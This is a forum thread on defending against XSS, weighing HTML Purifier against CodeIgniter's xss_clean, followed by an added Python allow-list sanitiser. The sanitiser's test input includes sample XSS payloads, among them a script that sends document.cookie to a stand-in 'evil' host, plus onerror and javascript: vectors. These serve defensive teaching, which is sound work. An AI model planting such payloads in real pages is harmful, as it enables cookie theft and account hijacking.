Are you sure about handling SECURITY?!
#8

(07-17-2016, 04:00 PM)PaulD Wrote: Hi again,

HTML Purifier: (The apple)
Quote:HTML Purifier will not only remove all malicious code (better known as XSS) with a thoroughly audited, secure yet permissive whitelist, it will also make sure your documents are standards compliant, something only achievable with a comprehensive knowledge of W3C's specifications.
http://htmlpurifier.org/

XSS_clean: (The pear)
Quote:CodeIgniter comes with a Cross Site Scripting prevention filter, which looks for commonly used techniques to trigger JavaScript or other types of code that attempt to hijack cookies or do other malicious things. If anything disallowed is encountered it is rendered safe by converting the data to character entities.
http://www.codeigniter.com/user_guide/li...-filtering

Using HTML purifier when you are not cleaning HTML input is like using a laser precision micro digital measuring device to find out if you need a haircut :-)

HTML Purifier does some very clever stuff, but in so doing it is a resource heavy and relatively time consuming operation. I do not think anyone would propose using it on a name field for a form.

Hope that helps,

Paul.

Greetings to you.

You mean using HTML Purifier or XSS_Clean is a trade-off, right? The first is better, but it is third party, and its operation is time consuming.

About xss_clean and "If anything disallowed is encountered it is rendered safe by converting the data to character entities": when I tested it, as I said before, if there was a <script> element in the field (a post), it did not print it as &lt;script&gt;; instead it printed [removed]!

Quote:I do not think anyone would propose using it on a name field for a form.

My main problem is about posts that will be shown to users and are full of tags, not a name field. As @mwhitney mentioned and said to a user, we cannot rely on database data; it is untrusted.

Thanks a lot.
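Added example, not part of this thread and not the code of HTML Purifier or CodeIgniter's xss_clean: the difference the two posts above are circling is allow-list sanitising (keep only tags and attributes you have named, drop everything else) versus pattern-based filtering (look for known bad strings such as <script> and replace them, which is where [removed] comes from). The small sanitiser below shows the allow-list approach on a post body, plus plain escaping for a field like a name, in Python on top of the standard-library parser so it runs offline. The tag and attribute allow-list, the helper names and the sample post are all made up for the illustration; it is a sketch of the principle, not a substitute for an audited library.

```python
"""Allow-list HTML sanitiser for untrusted post bodies (added illustration).

Assumption, not from the thread: the allow-list below is invented for the
example. Real sites tune it to their markup and prefer an audited library.
"""
from html import escape
from html.parser import HTMLParser

# Constructed allow-list: anything not named here is dropped.
ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "ul", "ol", "li",
                "code", "pre", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}
# Elements whose *content* must go too, not only the tag itself.
DROP_WITH_CONTENT = {"script", "style"}
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:")


def is_safe_url(value):
    """Reject javascript:/data:/vbscript: links, including obfuscated ones."""
    if value is None:
        return False
    # Browsers ignore whitespace and control characters inside a scheme
    # ("java\tscript:"), so strip them before looking at the scheme.
    compact = "".join(c for c in value
                      if c.isprintable() and not c.isspace()).lower()
    if ":" not in compact:
        return True  # relative URL, no scheme at all
    return compact.startswith(SAFE_URL_PREFIXES)


class AllowListSanitizer(HTMLParser):
    """Re-serialises only allow-listed tags/attributes and escapes all text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # so we can emit well-formed closing tags
        self.skipping = None  # set while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if self.skipping:
            return
        if tag in DROP_WITH_CONTENT:
            self.skipping = tag
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag (img, iframe, ...) is dropped, its text kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # onclick, onerror, style, ... never survive
            if name == "href" and not is_safe_url(value):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag == self.skipping:
            self.skipping = None
            return
        if tag in self.open_tags:
            # Close anything still open inside it so the output stays nested.
            while self.open_tags:
                inner = self.open_tags.pop()
                self.out.append(f"</{inner}>")
                if inner == tag:
                    break

    def handle_data(self, data):
        if self.skipping:
            return  # script/style body is discarded entirely
        # The parser already decoded entities, so "&lt;script&gt;" arrives as
        # "<script>" text and is re-encoded here instead of becoming a tag.
        self.out.append(escape(data, quote=False))

    # Comments, <!DOCTYPE ...> and <?php ... ?> hit the default no-op handlers.

    def close(self):
        super().close()
        for tag in reversed(self.open_tags):
            self.out.append(f"</{tag}>")
        self.open_tags.clear()


def sanitize_post(untrusted_html):
    """For rich-text bodies that must keep their (allowed) tags."""
    parser = AllowListSanitizer()
    parser.feed(untrusted_html)
    parser.close()
    return "".join(parser.out)


def escape_field(untrusted_text):
    """For plain fields such as a name: no HTML is allowed at all."""
    return escape(untrusted_text, quote=True)


if __name__ == "__main__":
    # Constructed sample post mixing legitimate markup with XSS attempts.
    sample = ('<p>Hi <b onclick="steal()">all</b>, see '
              '<a href="javascript:alert(1)">this</a> and '
              '<a href="https://example.com/?a=1&amp;b=2">that</a>.'
              '<script>document.location="http://evil/?c="+document.cookie</script>'
              '<img src=x onerror=alert(1)>1 &lt; 2 <i>bye')
    print(sanitize_post(sample))
    print(escape_field('<script>alert("name")</script>'))
```

The point to take from it: the sanitiser never has to recognise an attack. <img onerror>, <script>, a javascript: href and an onclick handler are all removed by the same rule (not on the list), and text that merely looks like a tag, such as a user typing &lt;script&gt; in a post, comes out as entities rather than as [removed]. Do this on the rich-text post body at output time (the database contents are untrusted, as @mwhitney said) and use plain escaping for a name field.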


RE: Are you sure about handling SECURITY?! - by pb.sajjad - 07-18-2016, 03:27 AM


